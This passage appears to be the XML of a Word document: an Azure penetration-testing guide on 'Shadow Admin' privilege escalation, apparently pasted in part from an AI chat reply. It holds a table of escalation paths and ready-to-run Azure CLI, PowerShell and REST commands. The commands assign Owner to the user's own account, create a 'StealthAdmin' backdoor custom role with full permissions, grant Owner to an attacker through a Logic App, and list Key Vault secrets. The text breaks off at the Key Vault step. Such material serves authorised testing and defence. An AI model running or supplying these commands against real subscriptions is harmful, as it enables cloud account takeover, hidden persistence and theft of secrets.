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5EFB" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF69BF">
        <w:t xml:space="preserve">Azure Shadow Admin Techniques </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C18ACC2" w14:textId="77777777" w:rsidR="00993B89" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="00EF69BF">
        <w:t xml:space="preserve">Shadow Admins are users or entities that do </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF69BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not appear to have admin rights</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF69BF">
        <w:t xml:space="preserve">, but can escalate or abuse misconfigured privileges to </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF69BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gain full control</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF69BF">
        <w:t xml:space="preserve"> over Azure resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A865B1" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="7C52219F" w14:textId="77777777" w:rsidR="00993B89" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF69BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Equivalent Shadow Admin Escalation Paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0C74C" w14:textId="77777777" w:rsidR="00993B89" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4852"/>
        <w:gridCol w:w="4184"/>
        <w:gridCol w:w="1754"/>
      </w:tblGrid>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="3124CD0C" w14:textId="77777777" w:rsidTr="00EB1FD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963C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Technique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25DBB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Azure Equivalent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91EB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Pentest Abuse Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="1A04C5B8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15AE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Attach Admin Role to Self or Other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BA99F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Microsoft.Authorization/roleAssignments/write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2AE0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Assign built-in role like Owner or User Access Administrator to own identity or another attacker-controlled object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="21A9F344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DE5D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Create New Role Assignment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C6A4D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Use Azure CLI: az role assignment create --assignee &lt;id&gt; --role "Owner" --scope &lt;scope&gt;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07FB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Silent privilege escalation if user can assign roles at scope.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="3CEAA3E8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62B55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Update Existing Role to Elevate Privileges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1521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Microsoft.Authorization/roleDefinitions/write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3DC6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Modify custom role to include admin-level permissions (e.g., * or Microsoft.Resources/*).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="3A444407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BFFE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Abuse User Access Administrator Role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3C68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Inherits roleAssignments/write → escalate via role assignment.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200C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Often overlooked – can assign Owner to self or backdoor users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="11F7BDA3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87F3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Reset Password or Credentials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5316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Graph API: Update user password, reset service principal credential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E5CB8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Take over other users or service principals.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="006AEA5E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2D1EE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Create or Update Automation Runbook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8EC0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Microsoft.Automation/automationAccounts/runbooks/write + start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15D1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Run attacker payloads under the context of the assigned runbook identity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="023620E2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C555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Abuse Logic Apps, Functions or WebJobs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815A9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Modify workflows or function code to invoke privileged operations.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DA30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Use managed identity to perform role assignment, secret retrieval, or data exfiltration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="68FA660E" w14:textId="77777777" w:rsidTr="00EB1FD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2F7A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Abuse Microsoft.ManagedIdentity/userAssignedIdentities/assign/action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2500F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Assign privileged user-assigned identities to VMs or Functions.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64038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Identity swap → execute under a different identity with higher privileges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="0CAB5741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0C63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Abuse Microsoft.Web/sites/config permissions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21FC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Update AppSettings to inject secrets, keys, or manipulate identities.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893B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Can inject key vault references or override connection strings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="3889BD15" w14:textId="77777777" w:rsidTr="00EB1FD4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F22A5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Run Resource Under Privileged Identity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D91A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az vm identity assign, az functionapp identity assign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8705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Assign attacker-controlled object to a privileged managed identity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="4711E659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A89F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lastRenderedPageBreak/>
              <w:t>Abuse Key Vault Access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9501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Access policies allowing secrets/get, keys/decrypt, certificates/get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D3EE0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Extract sensitive data (credentials, secrets) silently.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="074D612D" w14:textId="77777777" w:rsidTr="00EB1FD4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CF68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Create or Modify Custom Role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791E9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roleDefinitions/write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57C46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Create new custom role with hidden admin access and assign it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993B89" w:rsidRPr="006F38E7" w14:paraId="02FB8EB4" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:trHeight w:val="5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A35C" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006F38E7" w:rsidRDefault="00993B89" w:rsidP="00EB1FD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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Create/Invoke Logic App or Azure Function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DA1D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With Microsoft.Web/sites/* or Microsoft.Logic/workflows/* permissions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4E46" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006F38E7" w:rsidRDefault="00993B89" w:rsidP="00EB1FD4">
            <w:pPr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</w:pPr>
            <w:r w:rsidRPr="006F38E7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Backdoor automation triggered on schedule or via webhook.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="079E3682" w14:textId="77777777" w:rsidR="00993B89" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="5B9DC5A9" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="4EB4CA36" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF69BF">
        <w:t>Example Attack Flow: Azure Shadow Admin via Logic App</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE64C5" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF69BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get Contributor on Resource Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C834E" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF69BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deploy Logic App that runs ARM REST API</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF69BF">
        <w:br/>
        <w:t>→ Assigns "Owner" role to attacker's user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B6017B" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF69BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trigger Logic App</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263A3B9" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF69BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker now has full admin access across subscription or scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738CDA74" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="7DA583DB" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="00EF69BF" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="00EF69BF">
        <w:t>Would you like a PowerShell or CLI script set to automate some of these Shadow Admin techniques?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0622B" w14:textId="77777777" w:rsidR="00993B89" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C82DDF7" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:t>Shadow Admin Techniques: Azure CLI / PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238A3E79" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">Here is a set of </w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure CLI and PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve"> scripts and commands for exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shadow Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve"> scenarios in an </w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Cloud Penetration Test</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:t>. These assume you’ve already obtained some level of access (e.g., Contributor, Logic App contributor, or similar):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098B7776" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="467292A1" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Escalate Privileges by Assigning “Owner” to Yourself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FFD23" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:t>: User Access Administrator or permission to assign roles (Microsoft.Authorization/roleAssignments/write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474EE89A" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure CLI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E4153" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>az role assignment create \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245CDDC7" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  --assignee $(az ad signed-in-user show --query objectId -o tsv) \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B4DFDB" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  --role "Owner" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC8FC0" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  --scope /subscriptions/&lt;subscription-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5623A59F" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30959BAE" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>$me = az ad signed-in-user show --query objectId -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768230A8" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>New-AzRoleAssignment -ObjectId $me -RoleDefinitionName "Owner" -Scope "/subscriptions/&lt;subscription-id&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91A40C" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="1D4F6CDA" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Create Custom Role with Full Permissions and Assign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0FB0DA" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:t>: Microsoft.Authorization/roleDefinitions/write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740063DF" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure CLI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E04698E" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>az role definition create --role-definition '{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A525D0E" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  "Name": "StealthAdmin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C8AE36" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  "IsCustom": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D03C71" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  "Description": "Stealth Admin backdoor",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAB60F7" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  "Actions": [ "*" ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3BA20" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  "NotActions": [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF838AA" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  "AssignableScopes": ["/subscriptions/&lt;subscription-id&gt;"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA29FD5" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA928E" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>Then assign:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48354C2B" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>az role assignment create --assignee &lt;attacker-object-id&gt; --role "StealthAdmin" --scope /subscriptions/&lt;subscription-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB7EDC1" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="0E28E0AE" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Abuse Logic App to Assign Admin Role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51402556" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:t>: Contributor on Resource Group + Logic App permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E541F0" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F6B08" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:t>Create a Logic App via ARM template or CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7259D963" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:t>Logic App calls Azure Management REST API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF58FBD" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>POST https://management.azure.com/subscriptions/&lt;sub-id&gt;/providers/Microsoft.Authorization/roleAssignments/&lt;guid&gt;?api-version=2022-04-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169851B4" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="6C832C99" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F52CAFC" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26422AD9" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  "properties": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53727FB4" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">    "roleDefinitionId": "/subscriptions/&lt;sub-id&gt;/providers/Microsoft.Authorization/roleDefinitions/&lt;owner-role-id&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A99F10F" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">    "principalId": "&lt;attacker-object-id&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC1B008" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578AE5BE" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069C84C4" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:t>Trigger Logic App</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E0568" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>You now have “Owner” rights silently granted via automation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72423514" w14:textId="77777777" w:rsidR="00993B89" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="70FB3959" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89"/>
    <w:p w14:paraId="70D3F98D" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔑</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Inject or Steal Secrets via Key Vault (if AccessPolicy allows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19778F" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="006464A7">
        <w:t>: secrets/get or keys/decrypt on Key Vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C5AA0" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
      <w:r w:rsidRPr="006464A7">
        <w:t>az keyvault secret list --vault-name &lt;vault-name&gt; -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD965F" w14:textId="77777777" w:rsidR="00993B89" w:rsidRPr="006464A7" w:rsidRDefault="00993B89" w:rsidP="00993B89">
